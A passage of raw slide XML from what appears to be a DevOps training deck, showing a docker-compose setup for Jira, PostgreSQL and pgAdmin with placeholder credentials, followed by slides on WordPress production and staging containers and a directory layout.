              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    environment:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - ATL_JDBC_URL=jdbc:postgresql://postgresql:5432/jiradb</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - ATL_JDBC_USER=suheb</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - ATL_JDBC_PASSWORD=123456</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    depends_on:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - postgresql</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    restart: unless-stopped</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>  postgresql:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    image: postgres:14.13-bullseye</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    environment:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - POSTGRES_USER=suheb</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - POSTGRES_PASSWORD=123456</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - POSTGRES_DB=jira_db</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    ports:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - "10001:5432"</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    volumes:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - ./jira:/var/lib/postgresql/data</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>  pgadmin:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    image: dpage/pgadmin4</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    environment:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - PGADMIN_DEFAULT_EMAIL=admin@admin.com  # Change this to your preferred email</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - PGADMIN_DEFAULT_PASSWORD=admin  # Change this to a secure password</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    ports:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - "10002:80"</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    depends_on:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - postgresql</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>    volumes:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>      - ./jira:/var/lib/pgadmin</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>volumes:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>  postgresql_data:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="523"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="955"/>
              <a:t>  pgadmin_data:</a:t>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="955"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4995"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4996" name="Google Shape;4996;p811"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="200075"/>
            <a:ext cx="8520600" cy="436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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>upload a WordPress site and make production staging containers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/soft84ya/bcdservices/tree/master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Bcdservices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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://bcdservices.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.bcdservices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 5000"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5001" name="Google Shape;5001;p812"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="8606322" cy="4838701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 5005"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5006" name="Google Shape;5006;p813"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="707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200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Structure for HMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5007" name="Google Shape;5007;p813"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="879000"/>
            <a:ext cx="8302800" cy="4112100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production ENV (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	bcdservices_production/index.html (6080)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging   ENV (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
